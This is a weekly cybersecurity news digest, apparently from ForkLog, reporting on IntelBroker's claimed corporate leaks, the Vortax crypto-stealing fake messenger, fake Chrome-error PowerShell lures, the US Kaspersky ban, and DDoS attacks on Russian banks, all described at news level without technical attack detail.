Cybersecurity Highlights: Tech Giants’ Secrets for Monero and a Crypto Thief Disguised as a Messenger

We have compiled the most significant cybersecurity news of the week.

Hacker IntelBroker Claims Leaks at AMD, Apple, Atlassian, and T-Mobile

IntelBroker, a hacker known in cybercriminal circles, has been offering alleged leaks from several major companies for sale over the past few days.

He first published a data dump from chip manufacturer AMD. According to the hacker, the archive contains unreleased corporate solutions, client and employee information, software source codes, and financial data.

The seller did not specify the price or source of the files.

AMD told Bleeping Computer that it is investigating the potential incident with law enforcement.

In other posts, IntelBroker offers for sale:

• an exploit for RCE in Atlassian’s Jira application for 800,000 Monero (over $127 million at the time of writing);
• the source code of several Apple corporate tools;
• confidential data from telecommunications company T-Mobile, including administrator access to the Confluence server and internal Slack channels for developers.

T-Mobile representatives denied any system compromise, calling the published screenshots of their infrastructure outdated and likely stolen from a third-party service provider.

Fraudulent Messenger for Cryptocurrency Theft Spreads Online

Researchers at Recorded Future studied large-scale attacks on cryptocurrency holders using the Vortax malware, disguised as a virtual meeting application.

While monitoring data in Recorded Future Malware Intelligence, Recorded Future’s Insikt Group has identified a widespread cyberattack campaign involving Vortax, a purported virtual meeting software. pic.twitter.com/kxiGDxAKmh

— Recorded Future (@RecordedFuture) June 17, 2024

To lend legitimacy to the malware, its operator, identified as markopolo, maintains a dedicated blog on Medium and a verified X-account with a gold checkmark.

Vortax distributes several info-stealers, exploiting macOS vulnerabilities. Once inside a victim’s system, the malware not only empties cryptocurrency addresses but also steals available credentials for further resale.

Fake Errors in Google Chrome Used to Install Hidden Cryptominer

Cybercriminals created pop-ups with fake errors in Google Chrome, Microsoft Word, and OneDrive to trick users into running malicious PowerShell “fixes.” This was reported by researchers at Proofpoint.

Proofpoint threat researchers have noticed that a clever #socialengineering tactic is becoming increasingly popular amongst threat actors.https://t.co/gpQyGEfIo9

The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware. pic.twitter.com/Jh1neNd9rU

— Threat Insight (@threatinsight) June 17, 2024

The discovered payloads include the XMRig cryptominer, the Lumma Stealer for cryptocurrency wallets and other information, the DarkGate and NetSupport remote access trojans, the Matanbuchus malicious loader, and the Amadey Loader botnet.

In one scenario, users are redirected to a compromised site with a malicious script, which is hosted on the blockchain via Binance Smart Chain smart contracts.

Kaspersky Antivirus Banned in the US

On June 20, the administration of US President Joe Biden announced an upcoming ban on Kaspersky Lab’s antivirus software and the distribution of updates for it among American companies and consumers.

BREAKING: To protect our national security, the Commerce Dept. prohibits Kaspersky Lab from providing certain cybersecurity services & anti-virus products & services in the U.S. due to national security risks. Effective starting on July 20, 2024. #CyberSecurity #NationalSecurity

— BISgov (@BISgov) June 20, 2024

The decision is driven by “an unacceptable risk to US national security” due to the developer company’s ties to the Russian government.

American users of Kaspersky Antivirus are advised to find alternative cybersecurity software by September 29, 2024.

Russia Adopts “Right to Be Forgotten” Law

On June 19, the Federation Council approved a law requiring all search engines to ensure the “right to be forgotten” online, and banning search results from foreign sites that violate Russian laws. This was reported by TASS.

At the request of Roskomnadzor, search system operators must connect to the registry of information resources with restricted access within 30 working days and stop providing information about such sites within three working days.

Ukrainian Hackers Attack Banks and Payment Systems in Russia

On June 20, the IT ARMY of Ukraine conducted a large-scale DDoS attack on the Russian financial system, causing disruptions in major companies.

Among those affected were VTB, Sberbank, T-Bank (formerly Tinkoff), Alfa-Bank, Beeline, MTS, Rostelecom, Gazprombank, MegaFon, FPS, NPCS, UISC, and others.

Representatives of NPCS, the operator of the “Mir” payment cards, confirmed the incident and issues with service access.

According to them, the attack was carpet-bombing in nature, causing “all border network equipment to overload and network connectivity to be disrupted.”

Also on ForkLog:

• Tourists warned about AI-driven phishing.
• Kenya halted the investigation into Worldcoin.
• Bug hunters withdrew $3 million from Kraken due to an “extremely critical” vulnerability. Later, CertiK claimed involvement in this “white” hack.
• A Taiwanese resident was accused of placing bets on the Polymarket crypto platform.
• The Russian Prosecutor General announced control over cross-border cryptocurrency movements.
• Hamster Kombat players targeted by scammers.
• The Central Bank of Russia proposed freezing suspicious digital ruble transactions, while police warned of a new CBDC scam.
• A hacker with $27 million in bitcoins was arrested in Spain.
• A money laundering scheme through e-CNY was uncovered in China.
• Hackers sent Remilia assets worth $4.3 million to Tornado Cash.

What to Read This Weekend?

Alongside a guest author, we explore why on-chain analytics tools sometimes err in marking suspicious transactions.